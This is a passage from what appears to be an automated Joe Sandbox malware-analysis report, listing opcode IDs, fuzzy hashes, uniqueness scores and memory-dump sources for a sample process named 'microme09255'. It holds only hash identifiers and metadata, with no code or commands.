                                                                                                                                      • Instruction Fuzzy Hash: 51816C71A002058FDB15DF68D894B9DBBB1FF89310F14C16AE909AB395EB70DD45CB90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ca5c6467ea48e701fd7339349bb13145392df735aab14b0aa805d3b495ab4c23
                                                                                                                                      • Instruction ID: b7037691f4ee81e1900406d0557607d8ee437db31a2059c1d791d83110992238
                                                                                                                                      • Opcode Fuzzy Hash: ca5c6467ea48e701fd7339349bb13145392df735aab14b0aa805d3b495ab4c23
                                                                                                                                      • Instruction Fuzzy Hash: 6641B234B002068FDF229F69D4C576EB7A6EBC6310F21482BE509CB381DB35EC868781
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3aee79b893de7274bb3bd903a3f009f197a9a47d7fbbc2db7bf8629e6e38fc9c
                                                                                                                                      • Instruction ID: c20cbb27872e64c68e22e28de4f0fd7108da8fef961f74294b18d6a4436cf1de
                                                                                                                                      • Opcode Fuzzy Hash: 3aee79b893de7274bb3bd903a3f009f197a9a47d7fbbc2db7bf8629e6e38fc9c
                                                                                                                                      • Instruction Fuzzy Hash: DB317034E146059FCF15DF68D8956AEBBF2AF89300F11852AE846EB350DB70AC42CB40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: fd95d18e285d89b8df43dcb0a920ec829dc3a383a98f240dfcc2cd34e6113458
                                                                                                                                      • Instruction ID: bad4be6d189c8a91b1ca830e237d506a7ae8487653b717585764feb7dc10a8dc
                                                                                                                                      • Opcode Fuzzy Hash: fd95d18e285d89b8df43dcb0a920ec829dc3a383a98f240dfcc2cd34e6113458
                                                                                                                                      • Instruction Fuzzy Hash: 91319F75B001068BDF22DF69D4C566EBBA2EFC6310F25492AE509DB241CB34EC858781
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2d817a154f701d51f49f80e996430c8f59ae9e1558acb9f90378f4194b4d54a4
                                                                                                                                      • Instruction ID: 6061c079136a0050f82c1654a3045e10daffe36035a801145f71446306617695
                                                                                                                                      • Opcode Fuzzy Hash: 2d817a154f701d51f49f80e996430c8f59ae9e1558acb9f90378f4194b4d54a4
                                                                                                                                      • Instruction Fuzzy Hash: 7D315031E007099BDF16DFA9D4847AEB7B2EF95300F218526E806FB240EB71AD81CB50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f7e97a5ca174cd872b2b022c6ab3271b01197c5e5b5af956023e39dd4945aa7f
                                                                                                                                      • Instruction ID: 98156f6e305d1647dab1de756d462461ce5daddce7b8f06c9448e7f544bf5b78
                                                                                                                                      • Opcode Fuzzy Hash: f7e97a5ca174cd872b2b022c6ab3271b01197c5e5b5af956023e39dd4945aa7f
                                                                                                                                      • Instruction Fuzzy Hash: 15316D34E146099FCB15DF65D899AAEB7F2AF89300F11C52AE806EB350DB70AC42CB50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5971c4ec648f1629a9d1a80aa0a1d5e7e915e1af4d83fd5550c65e038a7dbaa0
                                                                                                                                      • Instruction ID: a1a03905e016d7e30377e8e6f5b0653233f81e8be9dc3d434f6518c2d89f21c6
                                                                                                                                      • Opcode Fuzzy Hash: 5971c4ec648f1629a9d1a80aa0a1d5e7e915e1af4d83fd5550c65e038a7dbaa0
                                                                                                                                      • Instruction Fuzzy Hash: 79410170D003489FDB15DF99C884ADEBBB5BF88314F608429E809AB254DB74AA45CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e7e58111d888ecbb5f44d6132fdea0717e2aa107e8247d247ce952f38a841c7a
                                                                                                                                      • Instruction ID: 3d5747fd4488259f3c3989989a3811158cb86e6d2801f552c314e73367199cec
                                                                                                                                      • Opcode Fuzzy Hash: e7e58111d888ecbb5f44d6132fdea0717e2aa107e8247d247ce952f38a841c7a
                                                                                                                                      • Instruction Fuzzy Hash: D1218D75E002059FDF15DF68E885AEEBBF1AB88300F108126E905EB351EB38ED418B90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f44f4357af3c7491f1ec67bf27bf6ab4a09d7a222ece15a6e9445f71b664d813
                                                                                                                                      • Instruction ID: ddf93571c7e3beb02b0b2e7cda4d76267017b2c08f2cb7d6245db7f668fc085d
                                                                                                                                      • Opcode Fuzzy Hash: f44f4357af3c7491f1ec67bf27bf6ab4a09d7a222ece15a6e9445f71b664d813
                                                                                                                                      • Instruction Fuzzy Hash: DE214F75F002199FDF11DF69E845AAEBBF5EB88310F118026E905EB355E735ED408B50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e523ab71ed6ca5723212adc5464f9e766c1028d33697f88f8bcc846db54ea4d9
                                                                                                                                      • Instruction ID: 3e64e5e38326eaf547c0ad53bf1c6e353a3c61dda682467f5fac4e7662057ec4
                                                                                                                                      • Opcode Fuzzy Hash: e523ab71ed6ca5723212adc5464f9e766c1028d33697f88f8bcc846db54ea4d9
                                                                                                                                      • Instruction Fuzzy Hash: 8E212131A1420A9BDB15DF65D4956DEF7B2EF89300F11C51AE806FB390DB70AD85CB50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9333b7a2a974c53b306f8c5ce4baa4c88356cb68097ac6a8faa2217cb5fbb575
                                                                                                                                      • Instruction ID: dccf3794d5fc033947eb9b60cbf0f26f893f0c476efde41270bb7958a109a5a6
                                                                                                                                      • Opcode Fuzzy Hash: 9333b7a2a974c53b306f8c5ce4baa4c88356cb68097ac6a8faa2217cb5fbb575
                                                                                                                                      • Instruction Fuzzy Hash: F9219231E143059BDB1ACFA4C845ADEB7B6AF89300F21855AF815BB390EB70AD42CB40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5ccd1604aea6a1169f329f3f4093423c89560063f53dce1d439eef874d92fa91
                                                                                                                                      • Instruction ID: cd626777a15abf841f7ed2e0d86ff08a3237b1524f7921f747f7dbe71071160b
                                                                                                                                      • Opcode Fuzzy Hash: 5ccd1604aea6a1169f329f3f4093423c89560063f53dce1d439eef874d92fa91
                                                                                                                                      • Instruction Fuzzy Hash: 8E21B3356243014FEF12FB28F88D76D3711EB8A354F12CD66E506CB695DA389E42CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3d0e1d6f8962359e38d024774ab029c5b8ded89d19ae65418e83cf42ef5d726d
                                                                                                                                      • Instruction ID: dd60ac90bb40c51474297c8a68950582cd8e40ed414c88c39bcc8167e3c2fbba
                                                                                                                                      • Opcode Fuzzy Hash: 3d0e1d6f8962359e38d024774ab029c5b8ded89d19ae65418e83cf42ef5d726d
                                                                                                                                      • Instruction Fuzzy Hash: 8821E7746042428FDF376738E4D837D3B71EB5B315F15486AE046DBAA1C6298CC1C702
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883315426.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_1fd000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 81bde3ea201ae39b6dd8722432e3bc9199e97235e5cdb44b7723db5e70ca9ee3
                                                                                                                                      • Instruction ID: 8a6165f357da571104d31b476c4adb57f1ff5780ca4ab047869ce4f2a99c2908
                                                                                                                                      • Opcode Fuzzy Hash: 81bde3ea201ae39b6dd8722432e3bc9199e97235e5cdb44b7723db5e70ca9ee3
                                                                                                                                      • Instruction Fuzzy Hash: C221F675608248DFEB08DF14E8C0B36BB66EB84314F34C5ADD9494B346C336D846CB61
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8b9b1b4c2471d3fd0ec4c6cd86aa087aad2e26377e1aeec30af784d7055de988
                                                                                                                                      • Instruction ID: 7164579882e5cf4791494191bd9773c0c9a893314147729e2c139c579a047fda
                                                                                                                                      • Opcode Fuzzy Hash: 8b9b1b4c2471d3fd0ec4c6cd86aa087aad2e26377e1aeec30af784d7055de988
                                                                                                                                      • Instruction Fuzzy Hash: B4216F31E143199BCF19CFA9D445A9EB7B6BF89300F21856AE815FB390DB70AC42CB50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ef90ed06a494097518256f5155f4f1ff4cde98e1961df4881cfa4d6b21110c97
                                                                                                                                      • Instruction ID: 4048b92bb6ca9bcb3a5756a5f57d50dc528a073aeb57283f543911a039f41a66
                                                                                                                                      • Opcode Fuzzy Hash: ef90ed06a494097518256f5155f4f1ff4cde98e1961df4881cfa4d6b21110c97
                                                                                                                                      • Instruction Fuzzy Hash: E7212834B00206CFDF25EBB4D5556AE77F6AB99340F200868D406EB2A0DF359D41CBA1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 136412d9bc5a4219129061625492094d3306ca0842951ac5eaf963c5dbacc37e
                                                                                                                                      • Instruction ID: bbb0ff80b9e529c9c2977c416107fd0602271d5312b9ec4af1b44b29f5e3b7a0
                                                                                                                                      • Opcode Fuzzy Hash: 136412d9bc5a4219129061625492094d3306ca0842951ac5eaf963c5dbacc37e
                                                                                                                                      • Instruction Fuzzy Hash: F321A1346202064FEF22FB28F48D75D3715EBCA354F12CD21E506CB255DA38EE428B91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: db00d9243b265eb07e17275c657167caec1b96b41c0807a59817e5db0635fc25
                                                                                                                                      • Instruction ID: f182a9bb3e76b63bb801fd7e2266976bc2739bce88e9717ee6b11cc8890654a4
                                                                                                                                      • Opcode Fuzzy Hash: db00d9243b265eb07e17275c657167caec1b96b41c0807a59817e5db0635fc25
                                                                                                                                      • Instruction Fuzzy Hash: 1B21C634A00214CFDB55EB78E958BADB7F6BB89305F104468E506EB3A1DB359D01CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 175ce435ab45ff5df7915a6666196fd7bea1a095bad43758987f6db16a552699
                                                                                                                                      • Instruction ID: 37b72692a1225026550f5b16a722479fe6f4e62bba5e5b7f63b56cdd133381ca
                                                                                                                                      • Opcode Fuzzy Hash: 175ce435ab45ff5df7915a6666196fd7bea1a095bad43758987f6db16a552699
                                                                                                                                      • Instruction Fuzzy Hash: 6A110631B0C3448FEF2BA679A8403B937959B96314F268D7ED046CF682DA29CD458BD1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f31d5288181564a66f37ac69c900ecd564c47429e83a09747a789c6df781c299
                                                                                                                                      • Instruction ID: e5264de7f76cbc8169bcb316d5eae19dcdf997ab9864237da3823ae361c37530
                                                                                                                                      • Opcode Fuzzy Hash: f31d5288181564a66f37ac69c900ecd564c47429e83a09747a789c6df781c299
                                                                                                                                      • Instruction Fuzzy Hash: 2311C231B082048FEF2AAB79E44477A73D5EB86354F22893AE106CF751DB25CD818BC1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8d7aece4a184bbbc5cd01a809ddc7214b8bb50fe6dc654374f6689d9c5941f09
                                                                                                                                      • Instruction ID: d2e31a6fddf298431adfbf3ec6a8e8fdbb552d96bb788274e1e4e7fd3486c343
                                                                                                                                      • Opcode Fuzzy Hash: 8d7aece4a184bbbc5cd01a809ddc7214b8bb50fe6dc654374f6689d9c5941f09
                                                                                                                                      • Instruction Fuzzy Hash: 2511C231F00211DFCF11AF78A8497AE7FF2AB88750F154666E906E3754EA348912CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6e4e3357f5e093fa4e1e4a43aaeb069ee237317096b8c53c1496e73d1e400cae
                                                                                                                                      • Instruction ID: 3130acb89df9196d24983f123310fd0f84b3d3f2e0f3ad98d98ca8e51ba0aa3d
                                                                                                                                      • Opcode Fuzzy Hash: 6e4e3357f5e093fa4e1e4a43aaeb069ee237317096b8c53c1496e73d1e400cae
                                                                                                                                      • Instruction Fuzzy Hash: 5D11A131B001284FCF15DA78D8196AE77AAEBC9350F01813AE406EB350EE75EC028BD0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 12381f11d8da015b4e0848934c3a10181e9e2cbd3b823544ebf989deff904643
                                                                                                                                      • Instruction ID: f1d5f72b8908be3849a67483ae7592556772db826e28e03319854e6d9e5e3aef
                                                                                                                                      • Opcode Fuzzy Hash: 12381f11d8da015b4e0848934c3a10181e9e2cbd3b823544ebf989deff904643
                                                                                                                                      • Instruction Fuzzy Hash: BA21E3B1D002599FCB11DFAAD884ADEFFB4FB49310F20822AE518B7250C3749554CFA5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 676fb8d0f10aeecab172e6913aca8a7d9b98a79796dc56823c0bce63f844c25e
                                                                                                                                      • Instruction ID: f03a01b76bc7d8f839093b6e0c940e122477416cfc5a778f12aa1efaca1bd0c4
                                                                                                                                      • Opcode Fuzzy Hash: 676fb8d0f10aeecab172e6913aca8a7d9b98a79796dc56823c0bce63f844c25e
                                                                                                                                      • Instruction Fuzzy Hash: F021C4B1D002199FCB01DF9AD984ADEFBB4FB49350F20812AE918B7300C374A954CFA5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b6e3e24fbbc0ff1723ed94eb706112f81504629f3ffe3018d14f03002ac3d080
                                                                                                                                      • Instruction ID: 5876e4288acde5361765b6d346fc6dfa787b91681655a7bc0d43cefafa017ca2
                                                                                                                                      • Opcode Fuzzy Hash: b6e3e24fbbc0ff1723ed94eb706112f81504629f3ffe3018d14f03002ac3d080
                                                                                                                                      • Instruction Fuzzy Hash: 2901B132B141144FCF15EA78AC256EF7BEA9BC9300F01413BE486DB284EE69AC0687D1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 93fd8ad817846881019fe64474ff8ca0b9f79d4b673425feb52854399ffcc90b
                                                                                                                                      • Instruction ID: ec800900dd6d6e4520667e2c0cd80b9f9cf78276632c0a42ca731ee8d0b1c7ee
                                                                                                                                      • Opcode Fuzzy Hash: 93fd8ad817846881019fe64474ff8ca0b9f79d4b673425feb52854399ffcc90b
                                                                                                                                      • Instruction Fuzzy Hash: CF014031A012169FCF26EFB984851AE7BF5EB49311B26047AD406EB301EA35DC418BD1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883315426.00000000001FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001FD000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_1fd000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b2bd6976026d354a6142bc6b35cb1794080d1e11c79b0ba0a28214b48a782f44
                                                                                                                                      • Instruction ID: dbe2a0e42daf476867502fd66ad308fee7d0cb6db53bacef849aa94f6f8b0d41
                                                                                                                                      • Opcode Fuzzy Hash: b2bd6976026d354a6142bc6b35cb1794080d1e11c79b0ba0a28214b48a782f44
                                                                                                                                      • Instruction Fuzzy Hash: B111D075508244CFDB05CF14D9C4B25BF62FB44314F28C6A9DD494B256C33AD84ACF91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: cf4ccefbac7f037361ac994e2c35f1da50046b416f39927235dc11ee4bac0225
                                                                                                                                      • Instruction ID: d5bda416b5a8f7c0045edcf6dc52cef91573ebcdb54f93a7268aa6a63a051a4b
                                                                                                                                      • Opcode Fuzzy Hash: cf4ccefbac7f037361ac994e2c35f1da50046b416f39927235dc11ee4bac0225
                                                                                                                                      • Instruction Fuzzy Hash: 6DF019349203089FDB04FFB8E59A59D7BB5AB84201F50C969E1059F255EA753B058B80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%